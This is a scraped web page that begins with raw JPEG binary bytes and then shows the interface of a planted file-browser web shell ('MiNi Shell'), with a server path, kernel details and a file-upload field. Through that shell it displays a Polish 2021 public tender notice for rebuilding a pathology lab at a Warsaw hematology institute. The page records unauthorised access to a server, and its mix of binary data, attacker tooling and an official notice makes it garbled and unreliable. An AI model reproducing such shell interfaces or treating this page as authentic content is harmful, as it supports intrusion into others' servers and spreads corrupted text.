JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033925602-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa części kondygnacji 1-go piętra bud. nr („A”) na potrzeby utworzenia Pracowni Patomorfologii: na terenie IHIT w W-wie ul. I. Gandhi 14 wraz z przebudową instalacji wewnętrznych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT HEMATOLOGII I TRANSFUZJOLOGII</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288484</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Indiry Gandhi 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-776</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zaopat@ihit.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ihit.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa części kondygnacji 1-go piętra bud. nr („A”) na potrzeby utworzenia Pracowni Patomorfologii: na terenie IHIT w W-wie ul. I. Gandhi 14 wraz z przebudową instalacji wewnętrznych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-72fbcdab-6969-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00339256</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ihit.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ihit.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ihit.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zostały zawarte w rozdziale XXVII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zostały zawarte w rozdziale XXVII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IHIT/P/114/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> przebudowa części kondygnacji 1-go piętra bud nr 1 („A”) na potrzeby utworzenia Pracowni Patomorfologii” na terenie Instytutu Hematologii i Transfuzjologii w Warszawie ul. Indiry Gandhi 14 wraz z przebudową instalacji wewnętrznych. Więcej informacji zawiera SWZ z Załącznikami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami i ich wagą: <br/>Kryterium oceny ofert i jego znaczenie oraz opis sposobu oceny ofert:<br/>Cena – 80%	<br/>Skrócenie terminu realizacji – 10%<br/>Wydłużenie terminu gwarancji – 10%<br/>3.	Za ofertę najkorzystniejszą uznana zostanie oferta o największej liczbie punktów otrzymanej po zsumowaniu punktacji uzyskanej w każdym z kryteriów, tj. „Cena”, „Termin realizacji zamówienia” <br/>i „Okres gwarancji” obliczona wg wzoru: Lp = C + Trz + Og<br/>gdzie:<br/>Lp - Liczba punktów łącznie<br/>C – Liczba punktów przyznana w kryterium Cena<br/>Trz – Liczba punktów przyznana w kryterium Termin realizacji zamówienia<br/>Og – Liczba punktów przyznana w kryterium Okres gwarancji<br/><br/>Weryfikacja zaoferowanych kryteriów dokonywana będzie na podstawie oświadczenia dokonanego <br/>w Załączniku nr 1 do SWZ – Formularz ofertowy.<br/>4.	Sposób obliczania punktacji w poszczególnych kryteriach:<br/>a)	Cena [C]<br/>Za kryterium Cena [C] Wykonawca może otrzymać maksymalnie – 80 punktów.<br/>Zamawiający przy wyliczaniu punków za ww. kryterium ograniczy się do dwóch miejsc po przecinku.<br/>Liczba punktów wg powyższego kryterium zostanie obliczona na podstawie poniższego wzoru:<br/> Cn <br/> C = --------x 80<br/> Cob<br/>gdzie: <br/>C - liczba punktów za kryterium cena;<br/>Cn - najniższa cena brutto;<br/>Cob - cena oferty badanej.<br/>b)	Termin realizacji zamówienia [Tzg]<br/>Za kryterium skrócenie terminu realizacji zamówienia [Tzg] Wykonawca może otrzymać maksymalnie – 10 punktów. <br/>Liczba punktów wg powyższego kryterium zostanie obliczona wg następującej zasady:<br/>- zaoferowanie terminu realizacji zamówienia do 30.06.2022 – 0 pkt.<br/>- zaoferowanie terminu realizacji zamówienia do 30.05.2022 – 5 pkt<br/>- zaoferowanie terminu realizacji zamówienia do 30.04.2022 – 10 pkt<br/>W przypadku niewskazania oferowanego terminu realizacji zamówienia w Formularzu ofertowym – Załączniku nr 1 do SWZ Zamawiający przyjmie, że zaoferowano maksymalny termin realizacji zamówienia wynoszący do dnia 30 czerwca 2022 r.<br/>c)	Okres gwarancji [Og]<br/>Za kryterium Okres gwarancji [Og] Wykonawca może otrzymać maksymalnie – 10 punktów. <br/>Liczba punktów wg powyższego kryterium zostanie obliczona wg następującej zasady:<br/>- zaoferowanie 36 miesięcy gwarancji – 0 pkt<br/>- zaoferowanie 48 miesięcy gwarancji – 5 pkt<br/>- zaoferowanie 60 miesięcy gwarancji – 10 pkt.<br/>W przypadku niewskazania oferowanego okresu gwarancji w Formularzu ofertowym – Załączniku nr 1 do SWZ Zamawiający przyjmie, że zaoferowano minimalny wymagany okres gwarancji wynoszący 36 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie terminu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Na podstawie art. 112 ustawy Pzp Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli wynika <br/>to z odrębnych przepisów:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowej<br/>	Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca:<br/>a)	Wykaże, że wykonał nie wcześniej niż w okresie 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Należy wykazać minimum 2 roboty budowlane (umowy) polegające na pracach adaptacyjnych* o łącznej wartości umów brutto co najmniej 1 500 000 zł. Wykaz robót Wykonawca przedstawi zgodnie <br/>z formularzem stanowiącym Załącznik nr 3 do SWZ.<br/>b)	Wykaże, że dysponuje lub będzie dysponował osobą zdolną do wykonywania zamówienia i oświadczy, że osoba przewidziana do realizacji zamówienia posiada:<br/>L.p.<br/>	Stanowisko	Wymagana liczba osób	Uprawnienia budowlane wykonywania samodzielnych funkcji w budownictwie	Praktyka w podobnych robotach (w latach)<br/>1.	Kierownik robót 1	specjalność instalacyjna w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych	Minimum 5 lat. Kandydat na stanowisko wraz z informacjami na temat jego kwalifikacji zawodowych, a także zakresu powierzonych czynności z informacją o podstawie dysponowania tą osobą Wykonawca przedstawi zgodnie z formularzem stanowiącym Załącznik nr 5 do SWZ oraz oświadczy, że osoba ta posiada wymagane uprawnienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Do oferty Wykonawca dołącza:<br/>1)	oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SWZ. Oświadczenie składane jest na podstawie art. 125 ust. 1 i stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert oraz stanowi dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe, wskazane w niniejszym rozdziale podrozdział II.2)	oświadczenia i dokumenty potwierdzające, że roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego zgodnie z wzorem stanowiącym Załącznik nr 3 do SWZ. 3)	Wykonawca składa w/w Oświadczenie - Załączniki nr 2 i 3 do SWZ w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do reprezentowania wykonawcy zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. 4)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu sporządza odrębnie: a)	Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku Oświadczenie – Załącznik nr 2 do SWZ potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>b)	podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku Oświadczenie – Załącznik nr 2 do SWZ potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału <br/>w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy;<br/>5)	Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu nie sporządza odrębnie:<br/>-	podwykonawca, na którego zasobach Wykonawca nie polega przy wykazywaniu spełnienia warunków udziału w postępowaniu. Zamawiający nie będzie weryfikował także podstaw wykluczenia w odniesieniu do takiego podwykonawcy.<br/>6)	Samooczyszczenie – w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 i 6 ustawy Pzp Wykonawca nie podlega wykluczeniu, jeżeli udowodni Zamawiającemu, że spełnił łącznie wszystkie konieczne do dokonania samooczyszczenia przesłanki opisane w art. 110 ust. 2 pkt 1,2,3 (a-e) ustawy Pzp.<br/>-	wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.<br/>7)	zobowiązanie podmiotu trzeciego, o którym mowa w rozdziale XII ust. 2 pkt 4) i ust. 3 pkt. 7) SWZ – jeżeli wykonawca polega na zasobach lub sytuacji podmiotu trzeciego – Załącznik nr 6 do SWZ.<br/>8)	Zamawiający zwraca się z prośbą aby do oferty załączyć kosztorys (może być w formie skróconej), celem weryfikacji składowych kwoty netto i brutto.<br/>3.	Zamawiający oceni, czy podjęte przez Wykonawcę czynności są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu Wykonawcy, a jeżeli uzna, że nie są wystarczające, wyklucza Wykonawcę.<br/>Do oferty Wykonawca załącza również: <br/>a)	Pełnomocnictwo (jeśli dotyczy)<br/>b)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>c)	Formularz ofertowy – Załącznik nr 1do SWZ<br/>d)	Wadium<br/>e)	Zastrzeżenie tajemnicy przedsiębiorstwa przedsiębiorstwa, Wykonawca, <br/>f)	Informacje dotyczące Wykonawcy (Załącznik nr 1 do SWZ)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">II.	DOKUMENTY SKŁADANE NA WEZWANIE <br/>1.	Zgodnie z art. 274 ust. 1 ustawy Pzp Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: 1)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór stanowi Załącznik nr 4 do SWZ; 2)	wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz <br/>z podaniem rodzaju, wartości, daty i miejsca wykonania oraz podmiotów na rzecz których te roboty zostały wykonane, oraz z załączeniem dowodów potwierdzających, że roboty te zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Wykaz należy sporządzić zgodnie z wzorem stanowiącym Załącznik nr 3 do SWZ; 3)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z oświadczeniem dotyczącym posiadania wymaganych uprawnień - w zakresie niezbędnym do wykazania spełnienia warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, o którym mowa w rozdziale XII ust. 1 pkt. 4 lit. b) SWZ – Załącznik nr 5 do SWZ.<br/>UWAGA: (dotyczy wszystkich dokumentów na potwierdzenie braku podstaw wykluczenia) W przypadku Wykonawców wspólnie składających ofertę dokumenty, o których mowa w ust. 1 pkt 1-2, zobowiązany jest złożyć każdy z Wykonawców wspólnie składających ofertę.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda na podstawie art. 281 ust. 2 pkt 10) ustawy Pzp od Wykonawców wniesienia wadium. <br/>2.	Każdy Wykonawca biorący udział w przetargu musi przed upływem terminu składania ofert wnieść wadium <br/>w wysokości: 30 988,00 zł. – (trzydzieści tysięcy dziewięćset osiemdziesiąt osiem zł. 00/100) <br/>3.	Wadium może być wnoszone w następujących formach: <br/>1) pieniądzu;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium w formie pieniężnej należy wpłacić na rachunek bankowy: BANK PEKAO S.A. nr rachunku <br/>16 1240 6003 1111 0000 4946 7956 z dopiskiem „wadium w postępowaniu IHIT/P/114/2021”.<br/>O uznaniu przez Zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu środków na rachunek wskazany przez Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacje znajdują się w Rozdziale XIV SWZ. Do oferty Wykonawcy dołączają Oświadczenie Wykonawcy wspólnie ubiegających się o udzielenie zamówienia - Załącznik nr 2 do SWZ. b)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia -	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które czynności w ramach dostawy wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Paragraf 16 wzoru umowy - Załącznik nr 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – 